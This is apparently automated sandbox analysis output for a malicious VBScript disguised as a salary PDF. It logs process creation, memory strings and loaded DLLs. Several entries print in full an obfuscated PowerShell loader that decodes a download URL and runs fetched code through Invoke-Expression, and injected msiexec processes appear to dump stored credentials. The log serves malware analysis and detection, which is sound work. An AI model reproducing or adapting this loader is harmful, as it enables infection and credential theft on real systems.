Source: msiexec.exe, msiexec.exe, 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: msiexec.exe, 0000000B.00000003.1810781718.0000000004990000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.1810663842.0000000004990000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.1812069255.0000000004990000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.1810715475.0000000004990000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.1810925816.0000000004990000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: msiexec.exe, msiexec.exe, 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: Salary Revision_pdf.vbs

ReversingLabs: Detection: 13%

Source: C:\Windows\SysWOW64\msiexec.exe

Evasive API call chain: __getmainargs,DecisionNodes,exit

graph_12-33237

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Revision_pdf.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Rastafarian Reservoiret spermatophobia Zwitterions Nonevading Paragraferes #>;$Forjttelserne='Horsehair';<#humeral Grainier Embathe Agaty #>;$Maksimale188=$Genanvendelsesprocessernconsumably+$host.UI; function Adiabaticlly($Megafonens){If ($Maksimale188) {$Mahajan++;}$Minim=$Genanvendelsesprocesserntolerability+$Megafonens.'Length'-$Mahajan; for( $Genanvendelsesprocesser=3;$Genanvendelsesprocesser -lt $Minim;$Genanvendelsesprocesser+=4){$Farings=$Genanvendelsesprocesser;$alma+=$Megafonens[$Genanvendelsesprocesser];$Erantissenes='Nemhed';}$alma;}function Vandende($Feriers){ .($Bibliografisk) ($Feriers);}$Mealymouthedness=Adiabaticlly 'In MslioRebzVani ndlPyrlfulaEni/sco ';$Mealymouthedness+=Adiabaticlly 'Fli5Udk.Con0nel stu(DevWB gi den RodskroAmpw Tos Po Re NTilTuge I l1 Li0.ha. La0 ,i;Ann DryWTi iB.onUnd6Ham4Aff;Oxy satxUnd6 Gi4Ung;Dam MisrDiavsva:The1Tia3,ou1Inf.til0T t)Ma. BhiGsidesamcRefk FioFa,/ Vi2 Ge0For1s,o0Fll0 pe1oft0 b1 i steF oiCherstieshafTv.oFlyx .t/Cen1 B 3 Co1s m.T.l0Uds ';$Verdeners=Adiabaticlly 'se u ass B ETi,r an-JunAForG EveTrsNDepT To ';$Belard=Adiabaticlly ' UdhNint A.tLi pIdis o:st /Alg/UndsovefWor4 O l sp.JacsserhBaaoIngpBr./ Muz brWDy AB lb P,mF drUd,m TuPInd/ KoDi fiCyswKria ,rnB siGe,.sacpBeif DabUdt ';$Preindisposition=Adiabaticlly 'P,e>neu ';$Bibliografisk=Adiabaticlly 'C iI .neAurxVel ';$Formaalene='Celiectomy';$Ujordiskes='\Taxlessly199.Cho';Vandende (Adiabaticlly 'Alp$bragHiel llo H bsidAMyclopl:PerRE eeselfjanrlucAUn CArstParOFo MWh eGenT,asrBulYHs 1Pos8 Un8,ne= No$ enEUnvNcriVOm : ffAEkiP Php odMetAs iTDisA la+sy $ U UCatjJouOG,irFordOveiNedsWrykKeeeFedssmi ');Vandende (Adiabaticlly ' H $ rGs,il svO onBTilA .aLA.d:.haFOrdO,lerRbes Ork dn Kvi,ngNansGOpksA tROxfEskos DaudorLa.kt nta titBoue FyrudksDel=Try$ .nbF rERholeddADirr,andHol.sursPo pGulL ori Ent pe(T n$ Exp eR.rne .tI UnNsepD liI LesTr.p fsosynsTo iLiktHosiKl,oTrinsv )Dul ');Vandende (Adiabaticlly 'Gen[KluNLileswaTI s. nsF oeimpRshaV oITrfCHaneC,up EpOAt IsigNKurT seMYasA roN T asilGValesilRgra]Fus:Fam:Ab srepEKa,cstaukn RInoIzootLudYPatpstoRps.O FrTDeaOZencsoloGr LDre Evi=s b Utu[.urnFodeDantsan.Lumss ae seCUriuspar R IUnjT dyKdep,dorPaaoLiltUnco,ubc saOFaclR,gt nyAnkpskuEAfs]Erk:Abo:D atsk lGurssty1Ran2sle ');$Belard=$Forskningsresultaters[0];$Estimeringens=(Adiabaticlly '.nd$ BagD sLsanoskrbAntaextlTol:sknMIndaEl UB rNAleD xpEHo,RVej=CornRemEVecwBu - AkoIntB InjTaneskic eatRep Hiss OpyLn sUnrTrefeattmodo.UndnBese Aft Er. enwForEUngB omcs,uLUnciVu EDolnModTGen ');Vandende ($Estimeringens);Vandende (Adiabaticlly 'Zak$UsaManraFodu FonIm,dIl eForrInd.vaaHF.oe llaTild unesymrbeestyr[ .t$ haV meO trTrad nesa n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnq
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Rastafarian Reservoiret spermatophobia Zwitterions Nonevading Paragraferes #>;$Forjttelserne='Horsehair';<#humeral Grainier Embathe Agaty #>;$Maksimale188=$Genanvendelsesprocessernconsumably+$host.UI; function Adiabaticlly($Megafonens){If ($Maksimale188) {$Mahajan++;}$Minim=$Genanvendelsesprocesserntolerability+$Megafonens.'Length'-$Mahajan; for( $Genanvendelsesprocesser=3;$Genanvendelsesprocesser -lt $Minim;$Genanvendelsesprocesser+=4){$Farings=$Genanvendelsesprocesser;$alma+=$Megafonens[$Genanvendelsesprocesser];$Erantissenes='Nemhed';}$alma;}function Vandende($Feriers){ .($Bibliografisk) ($Feriers);}$Mealymouthedness=Adiabaticlly 'In MslioRebzVani ndlPyrlfulaEni/sco ';$Mealymouthedness+=Adiabaticlly 'Fli5Udk.Con0nel stu(DevWB gi den RodskroAmpw Tos Po Re NTilTuge I l1 Li0.ha. La0 ,i;Ann DryWTi iB.onUnd6Ham4Aff;Oxy satxUnd6 Gi4Ung;Dam MisrDiavsva:The1Tia3,ou1Inf.til0T t)Ma. BhiGsidesamcRefk FioFa,/ Vi2 Ge0For1s,o0Fll0 pe1oft0 b1 i steF oiCherstieshafTv.oFlyx .t/Cen1 B 3 Co1s m.T.l0Uds ';$Verdeners=Adiabaticlly 'se u ass B ETi,r an-JunAForG EveTrsNDepT To ';$Belard=Adiabaticlly ' UdhNint A.tLi pIdis o:st /Alg/UndsovefWor4 O l sp.JacsserhBaaoIngpBr./ Muz brWDy AB lb P,mF drUd,m TuPInd/ KoDi fiCyswKria ,rnB siGe,.sacpBeif DabUdt ';$Preindisposition=Adiabaticlly 'P,e>neu ';$Bibliografisk=Adiabaticlly 'C iI .neAurxVel ';$Formaalene='Celiectomy';$Ujordiskes='\Taxlessly199.Cho';Vandende (Adiabaticlly 'Alp$bragHiel llo H bsidAMyclopl:PerRE eeselfjanrlucAUn CArstParOFo MWh eGenT,asrBulYHs 1Pos8 Un8,ne= No$ enEUnvNcriVOm : ffAEkiP Php odMetAs iTDisA la+sy $ U UCatjJouOG,irFordOveiNedsWrykKeeeFedssmi ');Vandende (Adiabaticlly ' H $ rGs,il svO onBTilA .aLA.d:.haFOrdO,lerRbes Ork dn Kvi,ngNansGOpksA tROxfEskos DaudorLa.kt nta titBoue FyrudksDel=Try$ .nbF rERholeddADirr,andHol.sursPo pGulL ori Ent pe(T n$ Exp eR.rne .tI UnNsepD liI LesTr.p fsosynsTo iLiktHosiKl,oTrinsv )Dul ');Vandende (Adiabaticlly 'Gen[KluNLileswaTI s. nsF oeimpRshaV oITrfCHaneC,up EpOAt IsigNKurT seMYasA roN T asilGValesilRgra]Fus:Fam:Ab srepEKa,cstaukn RInoIzootLudYPatpstoRps.O FrTDeaOZencsoloGr LDre Evi=s b Utu[.urnFodeDantsan.Lumss ae seCUriuspar R IUnjT dyKdep,dorPaaoLiltUnco,ubc saOFaclR,gt nyAnkpskuEAfs]Erk:Abo:D atsk lGurssty1Ran2sle ');$Belard=$Forskningsresultaters[0];$Estimeringens=(Adiabaticlly '.nd$ BagD sLsanoskrbAntaextlTol:sknMIndaEl UB rNAleD xpEHo,RVej=CornRemEVecwBu - AkoIntB InjTaneskic eatRep Hiss OpyLn sUnrTrefeattmodo.UndnBese Aft Er. enwForEUngB omcs,uLUnciVu EDolnModTGen ');Vandende ($Estimeringens);Vandende (Adiabaticlly 'Zak$UsaManraFodu FonIm,dIl eForrInd.vaaHF.oe llaTild unesymrbeestyr[ .t$ haV meO trTrad nesa n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnq
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kfiuinmpbcvzn"
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kfiuinmpbcvzn"
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vzonifxrpknexemx"
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\xbbfjqhklsfrakibsnra"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Rastafarian Reservoiret spermatophobia Zwitterions Nonevading Paragraferes #>;$Forjttelserne='Horsehair';<#humeral Grainier Embathe Agaty #>;$Maksimale188=$Genanvendelsesprocessernconsumably+$host.UI; function Adiabaticlly($Megafonens){If ($Maksimale188) {$Mahajan++;}$Minim=$Genanvendelsesprocesserntolerability+$Megafonens.'Length'-$Mahajan; for( $Genanvendelsesprocesser=3;$Genanvendelsesprocesser -lt $Minim;$Genanvendelsesprocesser+=4){$Farings=$Genanvendelsesprocesser;$alma+=$Megafonens[$Genanvendelsesprocesser];$Erantissenes='Nemhed';}$alma;}function Vandende($Feriers){ .($Bibliografisk) ($Feriers);}$Mealymouthedness=Adiabaticlly 'In MslioRebzVani ndlPyrlfulaEni/sco ';$Mealymouthedness+=Adiabaticlly 'Fli5Udk.Con0nel stu(DevWB gi den RodskroAmpw Tos Po Re NTilTuge I l1 Li0.ha. La0 ,i;Ann DryWTi iB.onUnd6Ham4Aff;Oxy satxUnd6 Gi4Ung;Dam MisrDiavsva:The1Tia3,ou1Inf.til0T t)Ma. BhiGsidesamcRefk FioFa,/ Vi2 Ge0For1s,o0Fll0 pe1oft0 b1 i steF oiCherstieshafTv.oFlyx .t/Cen1 B 3 Co1s m.T.l0Uds ';$Verdeners=Adiabaticlly 'se u ass B ETi,r an-JunAForG EveTrsNDepT To ';$Belard=Adiabaticlly ' UdhNint A.tLi pIdis o:st /Alg/UndsovefWor4 O l sp.JacsserhBaaoIngpBr./ Muz brWDy AB lb P,mF drUd,m TuPInd/ KoDi fiCyswKria ,rnB siGe,.sacpBeif DabUdt ';$Preindisposition=Adiabaticlly 'P,e>neu ';$Bibliografisk=Adiabaticlly 'C iI .neAurxVel ';$Formaalene='Celiectomy';$Ujordiskes='\Taxlessly199.Cho';Vandende (Adiabaticlly 'Alp$bragHiel llo H bsidAMyclopl:PerRE eeselfjanrlucAUn CArstParOFo MWh eGenT,asrBulYHs 1Pos8 Un8,ne= No$ enEUnvNcriVOm : ffAEkiP Php odMetAs iTDisA la+sy $ U UCatjJouOG,irFordOveiNedsWrykKeeeFedssmi ');Vandende (Adiabaticlly ' H $ rGs,il svO onBTilA .aLA.d:.haFOrdO,lerRbes Ork dn Kvi,ngNansGOpksA tROxfEskos DaudorLa.kt nta titBoue FyrudksDel=Try$ .nbF rERholeddADirr,andHol.sursPo pGulL ori Ent pe(T n$ Exp eR.rne .tI UnNsepD liI LesTr.p fsosynsTo iLiktHosiKl,oTrinsv )Dul ');Vandende (Adiabaticlly 'Gen[KluNLileswaTI s. nsF oeimpRshaV oITrfCHaneC,up EpOAt IsigNKurT seMYasA roN T asilGValesilRgra]Fus:Fam:Ab srepEKa,cstaukn RInoIzootLudYPatpstoRps.O FrTDeaOZencsoloGr LDre Evi=s b Utu[.urnFodeDantsan.Lumss ae seCUriuspar R IUnjT dyKdep,dorPaaoLiltUnco,ubc saOFaclR,gt nyAnkpskuEAfs]Erk:Abo:D atsk lGurssty1Ran2sle ');$Belard=$Forskningsresultaters[0];$Estimeringens=(Adiabaticlly '.nd$ BagD sLsanoskrbAntaextlTol:sknMIndaEl UB rNAleD xpEHo,RVej=CornRemEVecwBu - AkoIntB InjTaneskic eatRep Hiss OpyLn sUnrTrefeattmodo.UndnBese Aft Er. enwForEUngB omcs,uLUnciVu EDolnModTGen ');Vandende ($Estimeringens);Vandende (Adiabaticlly 'Zak$UsaManraFodu FonIm,dIl eForrInd.vaaHF.oe llaTild unesymrbeestyr[ .t$ haV meO trTrad nesa n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnq	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kfiuinmpbcvzn"	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kfiuinmpbcvzn"	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vzonifxrpknexemx"	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\xbbfjqhklsfrakibsnra"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
